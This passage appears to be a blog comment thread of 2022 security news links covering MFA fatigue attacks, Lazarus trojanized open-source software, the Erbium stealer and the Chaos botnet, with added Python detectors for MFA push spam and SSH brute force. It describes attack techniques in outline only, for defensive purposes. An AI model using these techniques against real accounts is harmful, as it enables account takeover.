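def tamper_idat(png: bytes, xor: int = 0x01) -> bytes:
    """Copy of the PNG with the last IDAT payload byte (part of the Adler-32
    trailer) XORed, keeping the chunk's stored CRC as it was: the CRC-32 and
    the Adler-32 checks then both fail, as the article describes."""
    out = PNG_SIGNATURE
    for ctype, data, stored, _ in parse_chunks(png):
        if ctype == b"IDAT":
            data = data[:-1] + bytes([data[-1] ^ xor])
        out += struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", stored)
    return out


if __name__ == "__main__":
    png = make_tiny_png()
    print("intact:  ", check_png(png))
    print("tampered:", check_png(tamper_idat(png)))
```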
Tomi Engdahl says:
High-Profile Hacks Show Effectiveness of MFA Fatigue Attacks
https://www.securityweek.com/high-profile-hacks-show-effectiveness-mfa-fatigue-attacks
What are MFA fatigue attacks and how can they be prevented?
Recent high-profile cyberattacks have demonstrated the effectiveness of an interesting method for getting past multi-factor authentication (MFA).
MFA provides an extra layer of security for user accounts. If a threat actor can obtain an account’s username and password through phishing or other methods, MFA should prevent them from accessing the account.
There are several types of MFA and attackers can use various methods to bypass this security layer. They can exploit MFA bypass vulnerabilities, use social engineering to trick the target into providing the one-time password, deploy phishing pages that harvest not only the username and password but also the MFA code, use malware that collects MFA codes, or hijack the victim’s phone number via SIM swapping to receive the codes meant for the target.
In recent months, there appears to have been an increase in attacks that rely on a method known as ‘MFA fatigue’ or ‘MFA push notification spam’.
This method targets MFA that relies on push notifications, where the user gets a push notification on their mobile device asking them to approve a login attempt after their username and password have been entered.
SMS-based multi-factor authentication has been proven to be insecure and many online services providers have replaced it with more secure alternatives. One of them is push notifications, which are displayed to the user either by the app associated with the service they want to access, or by a dedicated third-party app that works with multiple services.
While users would likely not approve the login if they only got one suspicious push notification, many users would and do approve them if they’re inundated with notifications.
Continuously getting MFA push notifications might lead the user to believe that there is a glitch and approving the request could put an end to the spamming. The victim could also approve the request accidentally. As soon as they hit the ‘Yes, it’s me’ button, the attacker can log into their account and perform malicious actions.
This method was leveraged in the recent attacks targeting Cisco and Uber. In the attack on Uber, the attacker increased their chances of success by combining it with social engineering. They contacted the victim on WhatsApp, claiming to be a member of the IT team and instructing them to approve the login to get the MFA notifications to stop.
Uber linked the attack to individuals associated with the Lapsus$ group, which over the past year targeted companies such as NVIDIA, Okta, Globant, Samsung, Vodafone, Ubisoft and Microsoft. A suspect was arrested in the United Kingdom shortly after the incident came to light.
Microsoft also reported seeing the Lapsus$ group use MFA fatigue, but it’s unclear if the method was also used in the attack aimed at the tech giant.
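The pattern the article describes (a burst of unanswered or denied push prompts followed by an approval) is visible in identity-provider logs. The following is an added example, not part of the SecurityWeek article: a small detector run over constructed log lines in a made-up format (timestamp, user, event, result, source IP), flagging users who receive repeated prompts in a short window and marking the case where the burst ends in an approval.

```python
"""Detect MFA push-notification fatigue from authentication logs.

Added example. The log format is constructed for this demo and is not any
real identity provider's schema; adapt parse_log() to your own export.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample log: a normal login by bob, a spam burst against alice
# that ends in an approval, and two unrelated prompts for carol.
SAMPLE_LOG = """\
2022-09-28T08:01:10Z bob mfa_push approved 198.51.100.10
2022-09-28T22:14:02Z alice mfa_push denied 203.0.113.5
2022-09-28T22:14:31Z alice mfa_push timeout 203.0.113.5
2022-09-28T22:15:04Z alice mfa_push denied 203.0.113.5
2022-09-28T22:15:40Z alice mfa_push timeout 203.0.113.5
2022-09-28T22:16:12Z alice mfa_push denied 203.0.113.5
2022-09-28T22:17:55Z alice mfa_push approved 203.0.113.5
2022-09-28T23:05:00Z carol mfa_push denied 192.0.2.77
2022-09-28T23:30:00Z carol mfa_push approved 192.0.2.78
"""


@dataclass(frozen=True)
class PushEvent:
    ts: datetime
    user: str
    result: str      # approved | denied | timeout
    src_ip: str


def parse_log(text: str) -> list[PushEvent]:
    """Parse the constructed space-separated log into PushEvent records, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, event, result, ip = line.split()
        if event != "mfa_push":
            continue
        events.append(PushEvent(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), user, result, ip))
    return sorted(events, key=lambda e: e.ts)


def detect_push_fatigue(events: list[PushEvent], window: timedelta = timedelta(minutes=10),
                        threshold: int = 3) -> list[dict]:
    """Return one alert per user who received >= `threshold` prompts within `window`.

    `approved_after_spam` is set when an approval arrives after at least
    threshold-1 denied/timed-out prompts in the same window: the signature of
    a successful fatigue attack, which warrants session revocation and a
    credential reset rather than a low-priority ticket.
    """
    by_user: dict[str, list[PushEvent]] = defaultdict(list)
    for e in events:
        by_user[e.user].append(e)

    alerts: dict[str, dict] = {}
    for user, evs in by_user.items():
        recent: list[PushEvent] = []          # prompts within `window` of the current one
        for e in evs:
            recent.append(e)
            while e.ts - recent[0].ts > window:
                recent.pop(0)
            if len(recent) < threshold:
                continue
            rejected = sum(1 for r in recent if r.result != "approved")
            alert = alerts.setdefault(user, {
                "user": user, "prompts": 0, "approved_after_spam": False,
                "first": recent[0].ts, "last": e.ts,
                "source_ips": sorted({r.src_ip for r in recent}),
            })
            alert["prompts"] = max(alert["prompts"], len(recent))
            alert["last"] = e.ts
            if e.result == "approved" and rejected >= threshold - 1:
                alert["approved_after_spam"] = True
    return sorted(alerts.values(), key=lambda a: a["user"])


if __name__ == "__main__":
    for a in detect_push_fatigue(parse_log(SAMPLE_LOG)):
        print(a)
```

Number matching (the user types a code shown on the login screen into the authenticator) and rate-limiting push prompts per account remove the "approve to make it stop" incentive; the detector above is for catching the campaign in logs where those controls are not yet in place.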
Tomi Engdahl says:
Report Shows How Long It Takes Ethical Hackers to Execute Attacks
https://www.securityweek.com/report-shows-how-long-it-takes-ethical-hackers-execute-attacks
A survey of more than 300 ethical hackers conducted by cybersecurity companies Bishop Fox and SANS Institute found that many could execute an end-to-end attack in less than a day.
The respondents were mostly from the United States, but they represented organizations that have operations around the world. A vast majority of them have been conducting ethical hacking for 10 years or less. Their experience includes being a member of an organization’s internal security team, offensive security firm consulting, bug bounty hunting, and independent hacking-for-hire.
The goal of the survey is to gain insight into how attackers think, how fast they are, and the tools they use, as well as to obtain information that could be useful to defenders looking to improve their security posture and refine their defensive and offensive strategies.
Nearly 40% of the surveyed ethical hackers said they can break into an environment more often than not, if not always.
When asked about how long it takes them to discover an exploitable vulnerability that gives them access to a targeted organization’s environment (perimeter breach), roughly 40% of respondents indicated that it takes them five hours or less, and nearly 5% believe they can do it in less than an hour.
Know Your Enemy, Know Yourself: Examining the Mind of a Cyber Attacker
https://bishopfox.com/blog/examine-cyber-attacker-minds
“If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.”
Sun Tzu’s simple concept can be applied to virtually any type of confrontation: know yourself and know your enemy. The degree of knowledge on both fronts predicts the outcome regardless of the type of confrontation. Forensic psychology investigates the motives and minds of criminals and can predict what would otherwise be unknown about criminal behavior. Interestingly, cybersecurity can follow a similar path to defend forward in any organization but often doesn’t.
Know yourself. The best cybersecurity teams go through painstaking measures to know themselves. They implement attack surface discovery, asset inventory, data classification, vulnerability scanning – the list goes on and on – and many security teams have a good sense of themselves. Defensive decisions are made based on risk in relation to business impact and investments are made accordingly.
Know your enemy. While knowing yourself is challenging, knowing your enemy is nearly impossible in cybersecurity. In a perfect world, you would be able to interrogate cybercriminals who are caught to better understand how they choose targets and select techniques. We invest in the science of forensic psychology for a reason – communicating with criminals teaches us what led to the reasons behind committing crimes.
Tomi Engdahl says:
Barbara Ortutay / Associated Press:
Amnesty International: Meta’s algorithms “proactively amplified and promoted content” on Facebook that incited violent hatred against the Rohingya in Myanmar
Rohingya seek reparations from Facebook for role in massacre
https://apnews.com/article/technology-business-bangladesh-myanmar-c5af9acec46a3042beed7f5e1bc71b8a
With roosters crowing in the background as he speaks from the crowded refugee camp in Bangladesh that’s been his home since 2017, Maung Sawyeddollah, 21, describes what happened when violent hate speech and disinformation targeting the Rohingya minority in Myanmar began to spread on Facebook.
“We were good with most of the people there. But some very narrow minded and very nationalist types escalated hate against Rohingya on Facebook,” he said. “And the people who were good, in close communication with Rohingya. changed their mind against Rohingya and it turned to hate.”
For years, Facebook, now called Meta Platforms Inc., pushed the narrative that it was a neutral platform in Myanmar that was misused by malicious people, and that despite its efforts to remove violent and hateful material, it unfortunately fell short. That narrative echoes its response to the role it has played in other conflicts around the world, whether the 2020 election in the U.S. or hate speech in India.
But a new and comprehensive report by Amnesty International states that Facebook’s preferred narrative is false. The platform, Amnesty says, wasn’t merely a passive site with insufficient content moderation. Instead, Meta’s algorithms “proactively amplified and promoted content” on Facebook, which incited violent hatred against the Rohingya beginning as early as 2012.
Despite years of warnings, Amnesty found, the company not only failed to remove violent hate speech and disinformation against the Rohingya, it actively spread and amplified it until it culminated in the 2017 massacre. The timing coincided with the rising popularity of Facebook in Myanmar, where for many people it served as their only connection to the online world. That effectively made Facebook the internet for a vast number of Myanmar’s population.
More than 700,000 Rohingya fled into neighboring Bangladesh that year. Myanmar security forces were accused of mass rapes, killings and torching thousands of homes owned by Rohingya.
“Meta — through its dangerous algorithms and its relentless pursuit of profit — substantially contributed to the serious human rights violations perpetrated against the Rohingya,” the report says.
A spokesperson for Meta declined to answer questions about the Amnesty report. In a statement, the company said it “stands in solidarity with the international community and supports efforts to hold the Tatmadaw accountable for its crimes against the Rohingya people.”
“Our safety and integrity work in Myanmar remains guided by feedback from local civil society organizations and international institutions, including the U.N. Fact-Finding Mission on Myanmar; the Human Rights Impact Assessment we commissioned in 2018; as well as our ongoing human rights risk management,” Rafael Frankel, director of public policy for emerging markets, Meta Asia-Pacific, said in a statement.
Like Sawyeddollah, who is quoted in the Amnesty report and spoke with the AP on Tuesday, most of the people who fled Myanmar — about 80% of the Rohingya living in Myanmar’s western state of Rakhine at the time — are still staying in refugee camps. And they are asking Meta to pay reparations for its role in the violent repression of Rohingya Muslims in Myanmar, which the U.S. declared a genocide earlier this year.
Amnesty’s report, out Wednesday, is based on interviews with Rohingya refugees, former Meta staff, academics, activists and others. It also relied on documents disclosed to Congress last year by whistleblower Frances Haugen, a former Facebook data scientist. It notes that digital rights activists say Meta has improved its civil society engagement and some aspects of its content moderation practices in Myanmar in recent years. In January 2021, after a violent coup overthrew the government, it banned the country’s military from its platform.
But critics, including some of Facebook’s own employees, have long maintained such an approach will never truly work. It means Meta is playing whack-a-mole trying to remove harmful material while its algorithms designed to push “engaging” content that’s more likely to get people riled up essentially work against it.
“These algorithms are really dangerous to our human rights. And what happened to the Rohingya and Facebook’s role in that specific conflict risks happening again, in many different contexts across the world,” said Pat de Brún, researcher and adviser on artificial intelligence and human rights at Amnesty.
“The company has shown itself completely unwilling or incapable of resolving the root causes of its human rights impact.”
In 2020, for instance, three years after the violence in Myanmar killed thousands of Rohingya Muslims and displaced 700,000 more, Facebook investigated how a video by a leading anti-Rohingya hate figure, U Wirathu, was circulating on its site.
The probe revealed that over 70% of the video’s views came from “chaining” — that is, it was suggested to people who played a different video, showing what’s “up next.” Facebook users were not seeking out or searching for the video, but had it fed to them by the platform’s algorithms.
Wirathu had been banned from Facebook since 2018.
“Even a well-resourced approach to content moderation, in isolation, would likely not have sufficed to prevent and mitigate these algorithmic harms. This is because content moderation fails to address the root cause of Meta’s algorithmic amplification of harmful content,” Amnesty’s report says.
“We believe that the genocide against Rohingya was possible only because of Facebook,” Sawyeddollah said. “They communicated with each other to spread hate, they organized campaigns through Facebook. But Facebook was silent.”
Tomi Engdahl says:
Newley Purnell / Wall Street Journal:
Audio: Meta executives told rights groups that a decision “at the highest levels” prevented a detailed report on hate speech in India “for security reasons”
Meta Officials Cite Security Concerns for Failing to Release Full India Hate-Speech Study
https://www.wsj.com/articles/meta-officials-cite-security-concerns-for-failing-to-release-details-of-india-hate-speech-study-11664370857?mod=djemalertNEWS
Executives at the Facebook parent privately shared with rights groups their disappointment about the sparse report, according to audio recordings
Executives at Meta Platforms Inc. privately told rights groups that security concerns prevented them from releasing details of its investigation into hate speech on its services in India, according to audio recordings heard by The Wall Street Journal.
Meta, the parent company of Facebook, in July released a four-page summary of a human-rights impact assessment on India, its biggest market by users, where it has faced accusations of failing to adequately police hate speech against religious minorities. The India summary was part of the company’s first global human-rights report. The 83-page global report offers detailed findings of some previous investigations; it included only general descriptions of its India assessment, which disappointed some rights advocates.
“This is not the report that the human-rights team at Meta wanted to publish, we wanted to be able to publish more,” Iain Levine, a Meta senior human-rights adviser, said during private online briefings with rights groups in late July after the summary was released, according to the recordings.
“A decision was made at the highest levels of the company based upon both internal and external advice that it was not possible to do so for security reasons,” he said.
Tomi Engdahl says:
Foo Yun Chee / Reuters:
The European Commission proposes the AI Liability Directive, seeking to make it easier to sue the makers of drones, robots, and other AI-based products
EU proposes rules making it easier to sue drone makers, AI systems
https://www.reuters.com/technology/eu-proposes-rules-making-it-easier-sue-drone-makers-ai-systems-2022-09-28/
BRUSSELS, Sept 28 (Reuters) – The European Commission on Wednesday proposed rules making it easier for individuals and companies to sue makers of drones, robots and other products equipped with artificial intelligence software for compensation for harm caused by them.
The AI Liability Directive aims to address the increasing use of AI-enabled products and services and the patchwork of national rules across the 27-country European Union.
Under the draft rules, victims can seek compensation for harm to their life, property, health and privacy due to the fault or omission of a provider, developer or user of AI technology, or for discrimination in a recruitment process using AI.
“We want the same level of protection for victims of damage caused by AI as for victims of old technologies,” Justice Commissioner Didier Reynders told a news conference.
Tomi Engdahl says:
Umar Shakir / The Verge:
Cloudflare releases Turnstile, a “privacy-preserving” CAPTCHA alternative that tests the browser, not the user, through JavaScript-based challenges, in beta
Turnstile is Cloudflare’s latest attempt to rid the web of CAPTCHAs
https://www.theverge.com/2022/9/28/23367035/cloudflare-turnstile-captcha-bot-blocker-beta?scrolla=5eb6d68b7fedc32c19ef33b4
If you’re tired of clicking on picture grids to identify traffic lights and bicycles, this approach might help change that
Cloudflare is testing a new kind of CAPTCHA that tests your browser instead of you. The company calls it Turnstile, and it’s designed to spare us from performing those mundane click-the-traffic-light kinds of tasks to verify you’re a human and not a bot.
Turnstile is being presented as “a user-friendly, privacy preserving alternative” to CAPTCHA. According to a press release, it will get rid of the interactive challenges used to verify people, which Cloudflare says normally take an average of 32 seconds to pass, and reduce the entire process to one second.
Instead of presenting a visual puzzle to a user, Turnstile applies one of many browser challenges that it rotates through to look for human behavior, amping up the difficulty if a visitor exhibits “non-human behaviors.” Turnstile uses JavaScript-based challenges that read the web browser environment for signals that indicate there’s a person entering the site, cycling through tests like proof of work, proof of space, and probing for web APIs. It also utilizes machine learning models to compare previously successful challenges with new ones, speeding up the passing process.
An interaction-free test that reduces confirmation time to one second
Announcing Turnstile, a user-friendly, privacy-preserving alternative to CAPTCHA
https://blog.cloudflare.com/turnstile-private-captcha-alternative/
Today, we’re announcing the open beta of Turnstile, an invisible alternative to CAPTCHA. Anyone, anywhere on the Internet, who wants to replace CAPTCHA on their site will be able to call a simple API, without having to be a Cloudflare customer or sending traffic through the Cloudflare global network. Sign up here for free.
There is no point in rehashing the fact that CAPTCHA provides a terrible user experience. It’s been discussed in detail before on this blog, and countless times elsewhere. The creator of the CAPTCHA has even publicly lamented that he “unwittingly created a system that was frittering away, in ten-second increments, millions of hours of a most precious resource: human brain cycles.” We hate it, you hate it, everyone hates it. Today we’re giving everyone a better option.
Tomi Engdahl says:
Microsoft: Lazarus hackers are weaponizing open-source software https://www.bleepingcomputer.com/news/security/microsoft-lazarus-hackers-are-weaponizing-open-source-software/
Microsoft says the North Korean-sponsored Lazarus threat group is trojanizing legitimate open-source software and using it to backdoor organizations in many industry sectors, such as technology, defense, and media entertainment. The list of open-source software weaponized by Lazarus state hackers to deploy the BLINDINGCAN (aka ZetaNile) backdoor includes PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and the muPDF/Subliminal Recording software installer. The PuTTY and KiTTY SSH clients were also used to backdoor targets’ devices in fake job skills assessments, as reported by Mandiant this month.
Tomi Engdahl says:
Erbium stealer on the hunt for data
https://www.malwarebytes.com/blog/news/2022/09/increasingly-popular-erbium-stealer-on-the-hunt-for-data
There’s a new slice of malware-as-a-service doing the rounds, although its actual newness is somewhat contested. The stealer, called Erbium, was first spotted on forums back in July 2022, but it seems nobody is quite sure when it started being deployed and snagging victims.
Nevertheless, it is now happily causing chaos for victims as it looks to steal a sizeable portion of data from infected machines. A slick tool with its own fully functional dashboard, its sights are set on targets not entirely dissimilar to other data stealers. System data collection, drive enumeration, and loading processes and DLLs into memory are all tell-tale signs that bad things are afoot on the target computer. Erbium targets multiple forms of cryptocurrency wallet, along with password managing software and two-factor authentication (2FA) data. Connections are made to Discord’s Content Delivery Network in order to potentially download more malware. According to the latest research available, it leans into that well-worn tactic of plundering several forms of web browser for passwords, autofill data, and also cookies. Browsers listed include Firefox, Chrome, Pale Moon, and even email client Thunderbird gets a mention.
Tomi Engdahl says:
New Royal Ransomware emerges in multi-million dollar attacks https://www.bleepingcomputer.com/news/security/new-royal-ransomware-emerges-in-multi-million-dollar-attacks/
A ransomware operation named Royal is quickly ramping up, targeting corporations with ransom demands ranging from $250,000 to over $2 million. Royal is an operation that launched in January 2022 and consists of a group of vetted and experienced ransomware actors from previous operations. Unlike most active ransomware operations, Royal does not operate as a Ransomware-as-a-Service but is instead a private group without affiliates.
Tomi Engdahl says:
Finnish intelligence warns Russia highly likely to turn to cyber in winter https://therecord.media/finnish-intelligence-warns-russia-highly-likely-to-turn-to-cyber-in-winter/
The head of the Finnish Security Intelligence Service (Suojelupoliisi or SUPO) says it is highly likely that Russia will turn to the cyber environment over the winter for espionage due to challenges impacting its human intelligence work. In the unclassified National Security Overview 2022 published on Thursday, SUPO said that Russia’s traditional intelligence gathering approach using spies with diplomatic cover has become substantially more difficult since Russia launched its war of aggression in Ukraine, as many Russian diplomats have been expelled from the West. The agency acknowledged that there are still some active intelligence officers working inside the country, but said the Finnish government has probably severed the connection to their Russian networks, at least for the time being, and little information is available through the usual channels.
Tomi Engdahl says:
International telecommunications depend on submarine cables: this is what would happen if Finland’s cables were cut
If Finland’s submarine cable connections were cut, banking traffic would come to a halt and the internet would not work.
https://www.iltalehti.fi/kotimaa/a/1409fff6-863d-4d84-ad7d-1671a4a5ec7c
International communications traffic depends on submarine cables.
Cables get damaged anyway, but the threat of sabotage is also possible.
If Finland’s cables were cut, internet use and banking traffic would come to a halt.
International telecommunications depend on submarine cables running along the seabed. In practice the network carries over 90 percent of international communications traffic. The cables are, however, vulnerable to eavesdropping and sabotage. Significant damage to the submarine cables would cause a break in communications traffic that would affect private individuals, companies, public organisations and, for example, banks.
A broad and flexible network
About ten cables leave Finland towards the other Nordic countries and Germany. These join the broad network of submarine cables that enables global communication. The submarine cable system is flexible, and communications traffic can be routed along different paths.
“Because of the interconnection in telecommunications we do not, for example, know which routes the information flows take when we use a search engine,” says Martti Lehto, professor of practice in cyber security at the University of Jyväskylä.
Also when damage is being repaired, traffic is routed along another cable without, for example, an internet user noticing any problem at all.
In addition to damage caused by ordinary fishing vessels and earthquakes, it is possible that deliberate damage could be inflicted on the cables. Damaging a cable is contrary to international law, but outside territorial waters enforcing surveillance is challenging.
Tomi Engdahl says:
Multi-Cloud Networks Require Cloud-Native Protection
https://www.securityweek.com/multi-cloud-networks-require-cloud-native-protection
By integrating with native security services on major cloud platforms, a CNP solution can correlate security findings to pinpoint risks and recommend mitigations
Solution sprawl is one of the biggest challenges facing security teams. Rapid digital transformation has led to nearly 60% of organizations having 30 or more security tools deployed across their organization, according to IBM’s Cyber Resilient Organization Study 2021. Almost a third have more than 50. And worse, this logistical nightmare sits atop an aggressive digital acceleration strategy spurred by the pandemic. It has already pushed many overtaxed security teams to the breaking point.
Compounding the problem, rapid cloud adoption, multi-cloud strategies, and diverse cloud workloads are further increasing security complexity and friction. Ironically, the shift to the cloud that was supposed to simplify things like remote access to applications and provide dynamic scale has actually led to even further security complexity. The first issue is that many of the security solutions in use on-premises may simply not be available in cloud platforms. And even when cloud versions are available, they often operate differently, increasing overhead while reducing configuration and policy enforcement consistency. And if those tools aren’t also cloud-native, even more friction results because integration requires cooperation across multiple stakeholders, including IT teams, application developers, DevOps engineers, and more.
It’s one of the reasons why, according to Gartner, 80% of organizations are at some stage of vendor and solution consolidation. Because while protecting cloud workloads is essential, undue complexity can impact their ability to detect and respond to threats, especially when events lack context from the cloud control plane. Furthermore, separate tools can generate hundreds of alerts that must be hunted down by hand to understand their scope and context, leading to alert fatigue and inaccurate prioritization. As a result, cloud threats can accumulate faster than they can be resolved.
Tomi Engdahl says:
Kaiji Botnet Successor ‘Chaos’ Targeting Linux, Windows Systems
https://www.securityweek.com/kaiji-botnet-successor-chaos-targeting-linux-windows-systems
Black Lotus Labs, Lumen Technologies’ threat intelligence team, has issued a warning on Chaos, the new variant of the Kaiji distributed denial-of-service (DDoS) botnet, targeting enterprises and large organizations.
Believed to be of Chinese origin, the Golang-based Kaiji malware emerged in early 2020, targeting Linux systems and internet of things (IoT) devices via SSH brute force attacks. By mid-2020, the threat was also targeting Docker servers.
The same as Kaiji, the recently observed Chaos malware is written in Go and uses SSH brute force attacks to infect new devices. Additionally, it also targets known vulnerabilities and uses stolen SSH keys for infection.
The threat works on multiple architectures, including ARM, Intel (i386), MIPS and PowerPC, and can run on both Linux and Windows, Black Lotus Labs says.
Once it has infected a device, Chaos establishes persistence and connects to an embedded command and control (C&C) server. Next, it receives staging commands, such as to start propagation via known CVEs or SSH, or to begin IP spoofing.
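The SSH brute-force propagation described above leaves a distinctive trail in the victim's sshd logs. The following is an added example, not Black Lotus Labs' detection logic or any code from the report: it parses constructed OpenSSH auth.log lines (the "Failed password" / "Accepted publickey" message shapes are the real syslog formats; the hostnames, users and addresses are made up) and flags a source that racks up failures inside a sliding window, plus the telling case of a successful login from a source that was just brute-forcing. The threshold and window values are assumptions to tune per environment.

```python
"""Spot SSH brute-force activity of the kind Chaos/Kaiji use to propagate.

Added example, not Black Lotus Labs' tooling. Log lines below are CONSTRUCTED;
only the sshd message formats are real.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<event>Failed password|Accepted password|Accepted publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

# Constructed sample: a fast brute force that succeeds (198.51.100.23), a user
# who mistypes once then uses a key (192.0.2.10), and a low-and-slow probe that
# spaces attempts 30 minutes apart (203.0.113.5).
SAMPLE_LOG = """\
Sep 30 10:00:01 edge sshd[2001]: Failed password for invalid user admin from 198.51.100.23 port 51000 ssh2
Sep 30 10:00:02 edge sshd[2002]: Failed password for root from 198.51.100.23 port 51001 ssh2
Sep 30 10:00:02 edge sshd[2003]: Failed password for invalid user pi from 198.51.100.23 port 51002 ssh2
Sep 30 10:00:03 edge sshd[2004]: Failed password for root from 198.51.100.23 port 51003 ssh2
Sep 30 10:00:04 edge sshd[2005]: Failed password for invalid user oracle from 198.51.100.23 port 51004 ssh2
Sep 30 10:00:05 edge sshd[2006]: Failed password for root from 198.51.100.23 port 51005 ssh2
Sep 30 10:00:09 edge sshd[2007]: Accepted password for root from 198.51.100.23 port 51006 ssh2
Sep 30 10:03:11 edge sshd[2010]: Failed password for alice from 192.0.2.10 port 40001 ssh2
Sep 30 10:03:20 edge sshd[2011]: Accepted publickey for alice from 192.0.2.10 port 40002 ssh2
Sep 30 12:00:00 edge sshd[2020]: Failed password for root from 203.0.113.5 port 60000 ssh2
Sep 30 12:30:00 edge sshd[2021]: Failed password for root from 203.0.113.5 port 60001 ssh2
Sep 30 13:00:00 edge sshd[2022]: Failed password for root from 203.0.113.5 port 60002 ssh2
Sep 30 13:30:00 edge sshd[2023]: Failed password for root from 203.0.113.5 port 60003 ssh2
Sep 30 14:00:00 edge sshd[2024]: Failed password for root from 203.0.113.5 port 60004 ssh2
Sep 30 14:30:00 edge sshd[2025]: Failed password for root from 203.0.113.5 port 60005 ssh2
"""


def parse(line, year=2022):
    """Return (timestamp, event, user, ip) or None for lines we do not model.
    syslog omits the year, so it is supplied by the caller."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["event"], m["user"], m["ip"]


def detect(log_text, threshold=5, window_s=60):
    """Return alerts as (ip, kind, detail).

    kind == "bruteforce" when >= threshold failures fall inside window_s
    seconds; kind == "success_after_bruteforce" when a flagged source then
    authenticates successfully, the moment a Chaos-style bot moves from
    guessing to installing itself."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still in window
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ts, event, user, ip = rec
        if event == "Failed password":
            q = recent[ip]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_s:
                q.popleft()          # drop failures that aged out of the window
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append((ip, "bruteforce", f"{len(q)} failures in {window_s}s"))
        elif event.startswith("Accepted") and ip in flagged:
            alerts.append((ip, "success_after_bruteforce", f"{event} for {user}"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert)
```

Two caveats the sample is built to show: the low-and-slow source at 203.0.113.5 never trips a 60-second window, so a longer window or a per-day count is needed alongside it, and a login that uses a stolen SSH key, the other infection path named above, produces a clean "Accepted publickey" with no preceding failures, which only stands out if the source address or key fingerprint is compared against what is normal for that host.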
Tomi Engdahl says:
North Korean Gov Hackers Caught Rigging Legit Software
https://www.securityweek.com/north-korean-gov-hackers-caught-rigging-legit-software
Threat hunters at Microsoft have intercepted a notorious North Korean government hacking group lacing legitimate open source software with custom malware capable of data theft, espionage, financial gain and network destruction.
The hackers, a sub-group of Lazarus that Microsoft calls ZINC, are weaponizing a wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installers in a new wave of malware attacks.
Redmond described the attackers as a “highly operational, destructive, and sophisticated nation-state activity group” and warned that its LinkedIn networking portal was also being abused to trawl for targets.
In a report documenting the discovery, Microsoft said the hackers use LinkedIn to connect with and befriend employees in organizations across multiple industries including media, defense and aerospace, and IT services in the US, UK, India, and Russia.
“Beginning in June 2022, ZINC employed traditional social engineering tactics by initially connecting with individuals on LinkedIn to establish a level of trust with their targets. Upon successful connection, ZINC encouraged continued communication over WhatsApp, which acted as the means of delivery for their malicious payloads,” Microsoft added.
ZINC weaponizing open-source software
https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/
Tomi Engdahl says:
Investors Bet on Ox Security to Guard Software Supply Chains
https://www.securityweek.com/investors-bet-ox-security-guard-software-supply-chains
The funding frenzy in the software supply chain space now includes Ox Security, an early-stage Israeli startup that just raised a whopping $34 million in seed-stage financing.
Ox Security, based in Tel Aviv, announced Wednesday that the $34 million funding round was led by Evolution Equity Partners, Team8, and M12, Microsoft’s venture fund. Investors at Rain Capital also participated.
Tomi Engdahl says:
More Than Half of Security Pros Say Risks Higher in Cloud Than On Premise
https://www.securityweek.com/more-half-security-pros-say-risks-higher-cloud-premise
Report shows that forty-five percent of companies have had four or more cloud incidents in the last year
A recent survey from machine identity solutions provider Venafi aimed to explore the complexity of cloud environments and the resulting impact on cybersecurity
Venafi surveyed 1,101 security decision makers (SDMs) in firms with more than 1,000 employees and found that eighty-one percent of companies have experienced a cloud security incident in the last year. Forty-five percent have suffered at least four security incidents in the same period. More than half of security decision makers believe that security risks are higher in the cloud than on-premise.
Twenty-four percent of the firms have more than 10,000 employees. Ninety-two percent of the SDMs are at manager level or above, with 49% at c-suite level or higher.
Most of the firms surveyed believe the underlying issue is the increasing complexity of their cloud deployments. Since these companies already host 41% of their applications in the cloud, and expect to increase this to 57% over the next 18 months, the problem is only likely to worsen in the future.
Tomi Engdahl says:
Australia Flags Tough New Data Protection Laws This Year
https://www.securityweek.com/australia-flags-tough-new-data-protection-laws-year
Australia could have tough new data protection laws in place this year in an urgent response to a cyberattack that stole from a telecommunications company the personal data of 9.8 million customers, the attorney-general said Thursday.
Attorney-General Mark Dreyfus said the government would make “urgent reforms” to the Privacy Act following the unprecedented hack last week on Optus, Australia’s second-largest wireless carrier.
Dreyfus said “I think it’s possible” for the law to be changed in the four remaining weeks that Parliament is scheduled to sit this year.
“I’m going to be looking very hard over the next four weeks at whether or not we can get reforms to the Privacy Act into the Parliament before the end of the year,” Dreyfus told reporters. Parliament next sits on Oct. 25.
Tomi Engdahl says:
Reuters:
An investigation shows the CIA failed to secure its messaging system used by Iranian spies, often hidden within websites, leading to capture, torture, and death
America’s Throwaway Spies
How the CIA failed Iranian informants in its secret war with Tehran
https://www.reuters.com/investigates/special-report/usa-spies-iran/
“This is a very serious, very serious intelligence goal to penetrate Iran’s nuclear weapons program. You don’t get a much higher priority than that.”
James Lawler, a former CIA officer whose focus included weapons of mass destruction and Iran
The CIA considers Iran one of its most difficult targets. Ever since Iranian students seized the American embassy in Tehran in 1979, the United States has had no diplomatic presence in the country. CIA officers are instead forced to recruit potential agents outside Iran or through online connections. The thin local presence leaves U.S. intelligence at a disadvantage amid events such as the protests now sweeping Iran over the death of a woman arrested for violating the country’s religious dress code.
Four former intelligence officers interviewed by Reuters said the agency is willing to take bigger risks with sources when it comes to spying on Iran. Curbing the Islamic Republic’s nuclear ambitions has long been a priority in Washington. Tehran insists its nuclear efforts are solely for energy needs.
